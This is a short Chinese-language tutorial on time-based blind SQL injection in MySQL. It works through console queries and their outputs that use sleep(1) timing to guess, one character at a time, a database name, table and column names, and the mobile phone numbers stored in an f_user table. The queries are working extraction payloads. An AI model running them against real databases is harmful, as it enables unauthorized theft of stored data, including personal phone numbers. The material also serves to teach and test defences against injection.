無需頁面報錯,而是根據頁面響應時間作判斷:條件為真時查詢會執行 sleep(1)(回應約 1.00 sec),條件為假時回傳空集合且幾乎不耗時(0.00 sec)。以下以 MySQL 為例。
mysql 基於時間的盲注
======================================================================================================================================================================

* 猜解庫名
  - 下面是猜解正確(char(0x66) 即字元 'f')
mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);
+----------+
| sleep(1) |
+----------+
|        0 |
+----------+
1 row in set (1.00 sec)

  - 下面是猜解錯誤
mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);
Empty set (0.00 sec)

* 猜解表名
  - 猜解正確
mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='f';
+----------+
| sleep(1) |
+----------+
|        0 |
+----------+
1 row in set (1.00 sec)

  - 猜解錯誤
mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema='fangjiangjun' limit 0,1)a where substr(a_tn, 1, 1)='x';
Empty set (0.00 sec)

* 猜解字段名
  - 第 1 個字元
mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 1, 1)='i';
+----------+
| sleep(1) |
+----------+
|        0 |
+----------+
1 row in set (1.01 sec)

  - 第 2 個字元
mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1)a where substr(a_cn, 2, 1)='d';
+----------+
| sleep(1) |
+----------+
|        0 |
+----------+
1 row in set (1.00 sec)

* 猜解字段值
  - 第 1 個字元
mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)='1';
+----------+
| sleep(1) |
+----------+
|        0 |
+----------+
1 row in set (1.00 sec)

  - 第 2 個字元(原文未附此查詢的結果)
mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='3';

  - 第 2 個字元
mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)='8';
+----------+
| sleep(1) |
+----------+
|        0 |
+----------+
1 row in set (1.00 sec)